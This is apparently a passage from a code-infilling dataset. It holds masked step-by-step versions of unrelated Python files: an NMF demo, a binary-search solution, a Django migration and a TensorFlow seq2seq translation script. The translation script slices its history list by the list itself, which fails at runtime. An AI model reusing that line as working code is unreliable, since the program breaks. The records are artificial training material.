np.zeros_like(S)\r\n resAT = np.zeros_like(A.T)\r\n for t in range(k):\r\n resS[arrangement[1][t]] = S[arrangement[0][t]]\r\n resAT[arrangement[1][t]] = A.T[arrangement[0][t]]\r\n return resAT.T, resS\r\n\r\nif __name__ == \"__main__\":\r\n n = 50 \t\t\t# component resolution\r\n k = 3 \t\t\t# number of components\r\n b = 100\t\t\t# number of observations\r\n noise = 0.02 # stdev of added noise\r\n np.random.seed(101)\r\n\r\n # set up test data\r\n trueA = np.array([generateAmplitudes(k) for i in range(b)])\r\n trueS = np.array([generateComponent(n) for i in range(k)])\r\n trueY = np.dot(trueA,trueS)\r\n Y = add_noise(trueY, noise)\r\n # if noise is variable, specify variance matrix of the same shape as Y\r\n W = None\r\n\r\n A = np.array([generateAmplitudes(k) for i in range(b)])\r\n S = np.array([generateComponent(n) for i in range(k)])\r\n p1 = partial(po.prox_unity_plus, axis=1)\r\n proxs_g=[[p1], None]\r\n tr = Traceback(2)\r\n nmf(Y, A, S, W=W, prox_A=p1, e_rel=1e-6, e_abs=1e-6/noise**2, traceback=tr)\r\n # sort components to best match inputs\r\n A, S = match(A, S, trueS)\r\n\r\n # show data and model\r\n fig = plt.figure(figsize=(6,7))\r\n ax = fig.add_subplot(311)\r\n ax.set_title(\"True Components S\")\r\n ax.plot(trueS.T)\r\n ax2 = fig.add_subplot(312)\r\n ax2.set_title(\"Data Y\")\r\n ax2.plot(Y.T)\r\n ax3 = fig.add_subplot(313)\r\n ax3.set_title(\"Found Components S\")\r\n ax3.set_xlabel(\"Pixel\")\r\n ax3.plot(S.T)\r\n fig.subplots_adjust(bottom=0.07, top=0.95, hspace=0.35)\r\n fig.show()\r\n\r\n # convergence plot from traceback\r\n convergences = []\r\n As = tr['X',0]\r\n Ss = tr['X',1]\r\n for it in range(tr.it):\r\n Y = np.dot(As[it], Ss[it])\r\n convergences.append(((Y - trueY)**2).sum())\r\n fig2 = plt.figure(figsize=(6,4))\r\n ax4 = fig2.add_subplot(111)\r\n ax4.set_title(\"Convergence\")\r\n ax4.semilogy(convergences)\r\n ax4.set_ylabel(\"$||Y-AS||^2$\")\r\n ax4.set_xlabel(\"Iterations\")\r\n fig2.show()\r\n\r\n \"\"\"\r\n # noise plot\r\n #noises = np.linspace(0,0.05,21)\r\n #repeat = 10\r\n noises = [noise]\r\n repeat = 1000\r\n A_chi_squared = np.empty((len(noises), repeat))\r\n S_chi_squared = np.empty((len(noises), repeat))\r\n for i in range(len(noises)):\r\n e = noises[i]\r\n for r in range(repeat):\r\n Y = add_noise(trueY, e)\r\n A, S = nmf.nmf(Y, A0, S0, e_rel=1e-4, e_abs=1e-4, )\r\n A, S = match(A, S, trueS)\r\n A_chi_squared[i,r] = np.sum((A - trueA)**2)\r\n S_chi_squared[i,r] = np.sum((S - trueS)**2)\r\n fig3 = plt.figure(figsize=(6,4))\r\n ax5 = fig3.add_subplot(111)\r\n dof_A = A.shape[0]*A.shape[1]\r\n dof_S = S.shape[0]*S.shape[1]\r\n ax5.errorbar(noises, S_chi_squared.mean(axis=1)/dof_S, yerr=S_chi_squared.std(axis=1)/dof_S, label=\"$\\chi^2_S$ / DOF\")\r\n ax5.errorbar(noises, A_chi_squared.mean(axis=1)/dof_A, yerr=A_chi_squared.std(axis=1)/dof_A, label=\"$\\chi^2_A$ / DOF\")\r\n ax5.legend()\r\n ax5.set_ylabel(\"Chi-squared\")\r\n ax5.set_xlabel(\"Standard deviation of noise\")\r\n fig3.show()\r\n \"\"\"\r\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
"""
Package for django_static_template.
"""
|
flexible
|
{
"blob_id": "818623621b609d67f8f657be4ade6e3bb86a0bc5",
"index": 4226,
"step-1": "<mask token>\n",
"step-2": "\"\"\"\r\nPackage for django_static_template.\r\n\"\"\"\r\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
def searchRange(self, nums: List[int], target: int) ->List[int]:
res = [-1, -1]
def binary_serach(left, right, target, res):
if left >= right:
return
mid = (left + right) // 2
if nums[mid] == target:
if res[0] == -1:
res[0] = res[1] = mid
else:
res[0] = min(res[0], mid)
res[1] = max(res[1], mid)
if nums[mid] > target:
binary_serach(left, mid, target, res)
elif nums[mid] < target:
binary_serach(mid + 1, right, target, res)
else:
binary_serach(left, mid, target, res)
binary_serach(mid + 1, right, target, res)
if nums:
binary_serach(0, len(nums), target, res)
return res
|
flexible
|
{
"blob_id": "18b82f83d3bf729eadb2bd5a766f731a2c54a93b",
"index": 1607,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def searchRange(self, nums: List[int], target: int) ->List[int]:\n res = [-1, -1]\n\n def binary_serach(left, right, target, res):\n if left >= right:\n return\n mid = (left + right) // 2\n if nums[mid] == target:\n if res[0] == -1:\n res[0] = res[1] = mid\n else:\n res[0] = min(res[0], mid)\n res[1] = max(res[1], mid)\n if nums[mid] > target:\n binary_serach(left, mid, target, res)\n elif nums[mid] < target:\n binary_serach(mid + 1, right, target, res)\n else:\n binary_serach(left, mid, target, res)\n binary_serach(mid + 1, right, target, res)\n if nums:\n binary_serach(0, len(nums), target, res)\n return res\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('levantamiento', '0001_initial')]
operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('numero', models.IntegerField(default=0)
), ('largo', models.FloatField(default=0)), ('ancho', models.
FloatField(default=0)), ('alto', models.FloatField(default=0)), (
'parcial', models.IntegerField(default=0)), ('unidad', models.
IntegerField(default=0)), ('punitario', models.IntegerField(default
=0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=
'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)
), migrations.CreateModel(name='Metrado1', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField())], options={}, bases=(models.
Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('codigo', models.CharField(max_length=25
)), ('descripcion', models.TextField()), ('metrado1', models.
ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],
options={}, bases=(models.Model,)), migrations.CreateModel(name=
'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',
serialize=False, auto_created=True, primary_key=True)), ('codigo',
models.CharField(max_length=25)), ('descripcion', models.TextField(
)), ('metrado2', models.ForeignKey(related_name='metrado_3', to=
'metrados.Metrado2'))], options={}, bases=(models.Model,)),
migrations.CreateModel(name='Metrado4', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField()), ('metrado3', models.ForeignKey(
related_name='metrado_4', to='metrados.Metrado3'))], options={},
bases=(models.Model,)), migrations.AddField(model_name=
'fichatecnica', name='metrado1', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado1'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado2', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado2'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado3', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado3'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado4', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado4'),
preserve_default=True)]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [('levantamiento', '0001_initial')]
operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('numero', models.IntegerField(default=0)
), ('largo', models.FloatField(default=0)), ('ancho', models.
FloatField(default=0)), ('alto', models.FloatField(default=0)), (
'parcial', models.IntegerField(default=0)), ('unidad', models.
IntegerField(default=0)), ('punitario', models.IntegerField(default
=0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=
'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)
), migrations.CreateModel(name='Metrado1', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField())], options={}, bases=(models.
Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',
models.AutoField(verbose_name='ID', serialize=False, auto_created=
True, primary_key=True)), ('codigo', models.CharField(max_length=25
)), ('descripcion', models.TextField()), ('metrado1', models.
ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],
options={}, bases=(models.Model,)), migrations.CreateModel(name=
'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',
serialize=False, auto_created=True, primary_key=True)), ('codigo',
models.CharField(max_length=25)), ('descripcion', models.TextField(
)), ('metrado2', models.ForeignKey(related_name='metrado_3', to=
'metrados.Metrado2'))], options={}, bases=(models.Model,)),
migrations.CreateModel(name='Metrado4', fields=[('id', models.
AutoField(verbose_name='ID', serialize=False, auto_created=True,
primary_key=True)), ('codigo', models.CharField(max_length=25)), (
'descripcion', models.TextField()), ('metrado3', models.ForeignKey(
related_name='metrado_4', to='metrados.Metrado3'))], options={},
bases=(models.Model,)), migrations.AddField(model_name=
'fichatecnica', name='metrado1', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado1'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado2', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado2'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado3', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado3'),
preserve_default=True), migrations.AddField(model_name=
'fichatecnica', name='metrado4', field=models.ForeignKey(
related_name='ficha_tecnica', to='metrados.Metrado4'),
preserve_default=True)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('levantamiento', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FichaTecnica',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('numero', models.IntegerField(default=0)),
('largo', models.FloatField(default=0)),
('ancho', models.FloatField(default=0)),
('alto', models.FloatField(default=0)),
('parcial', models.IntegerField(default=0)),
('unidad', models.IntegerField(default=0)),
('punitario', models.IntegerField(default=0)),
('form', models.ForeignKey(related_name='ficha_tecnica', to='levantamiento.Levantamiento')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado1',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado2',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
('metrado1', models.ForeignKey(related_name='metrado_2', to='metrados.Metrado1')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado3',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
('metrado2', models.ForeignKey(related_name='metrado_3', to='metrados.Metrado2')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Metrado4',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('codigo', models.CharField(max_length=25)),
('descripcion', models.TextField()),
('metrado3', models.ForeignKey(related_name='metrado_4', to='metrados.Metrado3')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='fichatecnica',
name='metrado1',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado1'),
preserve_default=True,
),
migrations.AddField(
model_name='fichatecnica',
name='metrado2',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado2'),
preserve_default=True,
),
migrations.AddField(
model_name='fichatecnica',
name='metrado3',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado3'),
preserve_default=True,
),
migrations.AddField(
model_name='fichatecnica',
name='metrado4',
field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado4'),
preserve_default=True,
),
]
|
flexible
|
{
"blob_id": "1049a7d2cdc54c489af6246ec014deb63a98f96d",
"index": 3951,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('levantamiento', '0001_initial')]\n operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('numero', models.IntegerField(default=0)\n ), ('largo', models.FloatField(default=0)), ('ancho', models.\n FloatField(default=0)), ('alto', models.FloatField(default=0)), (\n 'parcial', models.IntegerField(default=0)), ('unidad', models.\n IntegerField(default=0)), ('punitario', models.IntegerField(default\n =0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=\n 'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)\n ), migrations.CreateModel(name='Metrado1', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', models.CharField(max_length=25)), (\n 'descripcion', models.TextField())], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('codigo', models.CharField(max_length=25\n )), ('descripcion', models.TextField()), ('metrado1', models.\n ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('codigo',\n models.CharField(max_length=25)), ('descripcion', models.TextField(\n )), ('metrado2', models.ForeignKey(related_name='metrado_3', to=\n 'metrados.Metrado2'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='Metrado4', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', models.CharField(max_length=25)), (\n 'descripcion', models.TextField()), ('metrado3', models.ForeignKey(\n related_name='metrado_4', to='metrados.Metrado3'))], options={},\n bases=(models.Model,)), migrations.AddField(model_name=\n 'fichatecnica', name='metrado1', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado1'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado2', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado2'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado3', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado3'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado4', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado4'),\n preserve_default=True)]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('levantamiento', '0001_initial')]\n operations = [migrations.CreateModel(name='FichaTecnica', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('numero', models.IntegerField(default=0)\n ), ('largo', models.FloatField(default=0)), ('ancho', models.\n FloatField(default=0)), ('alto', models.FloatField(default=0)), (\n 'parcial', models.IntegerField(default=0)), ('unidad', models.\n IntegerField(default=0)), ('punitario', models.IntegerField(default\n =0)), ('form', models.ForeignKey(related_name='ficha_tecnica', to=\n 'levantamiento.Levantamiento'))], options={}, bases=(models.Model,)\n ), migrations.CreateModel(name='Metrado1', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', models.CharField(max_length=25)), (\n 'descripcion', models.TextField())], options={}, bases=(models.\n Model,)), migrations.CreateModel(name='Metrado2', fields=[('id',\n models.AutoField(verbose_name='ID', serialize=False, auto_created=\n True, primary_key=True)), ('codigo', models.CharField(max_length=25\n )), ('descripcion', models.TextField()), ('metrado1', models.\n ForeignKey(related_name='metrado_2', to='metrados.Metrado1'))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'Metrado3', fields=[('id', models.AutoField(verbose_name='ID',\n serialize=False, auto_created=True, primary_key=True)), ('codigo',\n models.CharField(max_length=25)), ('descripcion', models.TextField(\n )), ('metrado2', models.ForeignKey(related_name='metrado_3', to=\n 'metrados.Metrado2'))], options={}, bases=(models.Model,)),\n migrations.CreateModel(name='Metrado4', fields=[('id', models.\n AutoField(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)), ('codigo', models.CharField(max_length=25)), (\n 'descripcion', models.TextField()), ('metrado3', models.ForeignKey(\n related_name='metrado_4', to='metrados.Metrado3'))], options={},\n bases=(models.Model,)), migrations.AddField(model_name=\n 'fichatecnica', name='metrado1', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado1'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado2', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado2'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado3', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado3'),\n preserve_default=True), migrations.AddField(model_name=\n 'fichatecnica', name='metrado4', field=models.ForeignKey(\n related_name='ficha_tecnica', to='metrados.Metrado4'),\n preserve_default=True)]\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('levantamiento', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FichaTecnica',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero', models.IntegerField(default=0)),\n ('largo', models.FloatField(default=0)),\n ('ancho', models.FloatField(default=0)),\n ('alto', models.FloatField(default=0)),\n ('parcial', models.IntegerField(default=0)),\n ('unidad', models.IntegerField(default=0)),\n ('punitario', models.IntegerField(default=0)),\n ('form', models.ForeignKey(related_name='ficha_tecnica', to='levantamiento.Levantamiento')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado1',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado2',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ('metrado1', models.ForeignKey(related_name='metrado_2', to='metrados.Metrado1')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado3',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ('metrado2', models.ForeignKey(related_name='metrado_3', to='metrados.Metrado2')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Metrado4',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigo', models.CharField(max_length=25)),\n ('descripcion', models.TextField()),\n ('metrado3', models.ForeignKey(related_name='metrado_4', to='metrados.Metrado3')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado1',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado1'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado2',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado2'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado3',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado3'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='fichatecnica',\n name='metrado4',\n field=models.ForeignKey(related_name='ficha_tecnica', to='metrados.Metrado4'),\n preserve_default=True,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding:utf-8 -*-
import os
import numpy as np
import tensorflow as tf
from translate import datautil
import seq2seq_model
_buckets = []
convo_hist_limit = 1
max_source_length = 1
max_target_length = 2
flags = tf.app.flags
FLAGS = flags.FLAGS
tf.reset_default_graph
max_train_data_size = 0
data_dir = 'datacn/'
dropout = 1.0
grad_clip = 5.0
batch_size = 60
hidden_size = 14
num_layers = 2
learning_rate = 0.5
lr_decay_factor = 0.99
checkpoint_dir = 'data/checkpoints/'
hidden_size = 100
checkpoint_dir = 'fanyichina/checkpoints/'
data_dir = 'fanyichina'
_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]
def getfanyiInfo():
vocaben, rev_vocaben = datautil.initialize_vocabulary(
os.path.join(datautil.data_dir, datautil.vocabulary_fileen))
vocab_sizeen = len(vocaben)
vocabch, rev_vocabch = datautil.initialize_vocabulary(
os.path.join(datautil.data_dir, datautil.vocabulary_filech))
vocab_sizech = len(vocabch)
return vocab_sizeen, vocab_sizech, vocaben, vocabch
def createModel(session, forward_only, from_vocab_size, to_vocab_size):
model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size, _buckets, hidden_size, num_layers, dropout,
grad_clip, batch_size, learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf.float32)
ckpt = tf.train.latest_checkpoint(checkpoint_dir)
if ckpt != None:
model.saver.restore(session, ckpt)
else:
session.run(tf.global_variables_initializer())
return model
def main():
vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()
if not os.path.exists(checkpoint_dir):
os.mkdir(checkpoint_dir)
with tf.Session() as sess:
model = createModel(sess, True, vocab_sizeen, vocab_sizech)
model.batch_size = 1
conversation_history = []
while True:
prompt = '请输入:'
sentence = input(prompt)
conversation_history.append(sentence)
conversation_history = conversation_history[-conversation_history:]
token_ids = list(reversed(datautil.sentence_to_ids(
" ".join(conversation_history), vocaben, normalize_digits=True, Isch=True)))
bucket_id = min([b for b in range(len(_buckets))
if _buckets[b][0] > len(token_ids)])
encoder_inputs, decoder_inputs, target_weights = model.get_batch(
{bucket_id: [(token_ids, [])]}, bucket_id)
_, _, output_logits = model.step(
sess, encoder_inputs, decoder_inputs, target_weights, bucket_id, True)
outputs = [int(np.argmax(logit, axis=1))
for logit in output_logits]
if datautil.EOS_ID in outputs:
outputs = outputs[:outputs.index(datautil.EOS_ID)]
convo_output = " ".join(
datautil.ids2texts(outputs, rev_vocabch))
conversation_history.append(convo_output)
else:
print('can not translation!')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "b7007778ea9dfac3af8c31d66d32d8157dc0d69b",
"index": 1517,
"step-1": "<mask token>\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\n<mask token>\n",
"step-2": "<mask token>\ntf.reset_default_graph\n<mask token>\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n token_ids = list(reversed(datautil.sentence_to_ids(' '.join(\n conversation_history), vocaben, normalize_digits=True, Isch\n =True)))\n bucket_id = min([b for b in range(len(_buckets)) if _buckets[b]\n [0] > len(token_ids)])\n encoder_inputs, decoder_inputs, target_weights = model.get_batch({\n bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(sess, encoder_inputs,\n decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits\n ]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n convo_output = ' '.join(datautil.ids2texts(outputs,\n rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\n_buckets = []\nconvo_hist_limit = 1\nmax_source_length = 1\nmax_target_length = 2\nflags = tf.app.flags\nFLAGS = flags.FLAGS\ntf.reset_default_graph\nmax_train_data_size = 0\ndata_dir = 'datacn/'\ndropout = 1.0\ngrad_clip = 5.0\nbatch_size = 60\nhidden_size = 14\nnum_layers = 2\nlearning_rate = 0.5\nlr_decay_factor = 0.99\ncheckpoint_dir = 'data/checkpoints/'\nhidden_size = 100\ncheckpoint_dir = 'fanyichina/checkpoints/'\ndata_dir = 'fanyichina'\n_buckets = [(20, 20), (40, 40), (50, 50), (60, 60)]\n\n\ndef getfanyiInfo():\n vocaben, rev_vocaben = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_fileen))\n vocab_sizeen = len(vocaben)\n vocabch, rev_vocabch = datautil.initialize_vocabulary(os.path.join(\n datautil.data_dir, datautil.vocabulary_filech))\n vocab_sizech = len(vocabch)\n return vocab_sizeen, vocab_sizech, vocaben, vocabch\n\n\ndef createModel(session, forward_only, from_vocab_size, to_vocab_size):\n model = seq2seq_model.Seq2SeqModel(from_vocab_size, to_vocab_size,\n _buckets, hidden_size, num_layers, dropout, grad_clip, batch_size,\n learning_rate, lr_decay_factor, forward_only=forward_only, dtype=tf\n .float32)\n ckpt = tf.train.latest_checkpoint(checkpoint_dir)\n if ckpt != None:\n model.saver.restore(session, ckpt)\n else:\n session.run(tf.global_variables_initializer())\n return model\n\n\ndef main():\n vocab_sizeen, vocab_sizech, vocaben, rev_vocabch = getfanyiInfo()\n if not os.path.exists(checkpoint_dir):\n os.mkdir(checkpoint_dir)\n with tf.Session() as sess:\n model = createModel(sess, True, vocab_sizeen, vocab_sizech)\n model.batch_size = 1\n conversation_history = []\n while True:\n prompt = '请输入:'\n sentence = input(prompt)\n conversation_history.append(sentence)\n conversation_history = conversation_history[-conversation_history:]\n token_ids = list(reversed(datautil.sentence_to_ids(' '.join(\n conversation_history), vocaben, normalize_digits=True, Isch\n =True)))\n bucket_id = min([b for b in range(len(_buckets)) if _buckets[b]\n [0] > len(token_ids)])\n encoder_inputs, decoder_inputs, target_weights = model.get_batch({\n bucket_id: [(token_ids, [])]}, bucket_id)\n _, _, output_logits = model.step(sess, encoder_inputs,\n decoder_inputs, target_weights, bucket_id, True)\n outputs = [int(np.argmax(logit, axis=1)) for logit in output_logits\n ]\n if datautil.EOS_ID in outputs:\n outputs = outputs[:outputs.index(datautil.EOS_ID)]\n convo_output = ' '.join(datautil.ids2texts(outputs,\n rev_vocabch))\n conversation_history.append(convo_output)\n else:\n print('can not translation!')\n\n\nif __name__ == '__main__':\n main()\n",
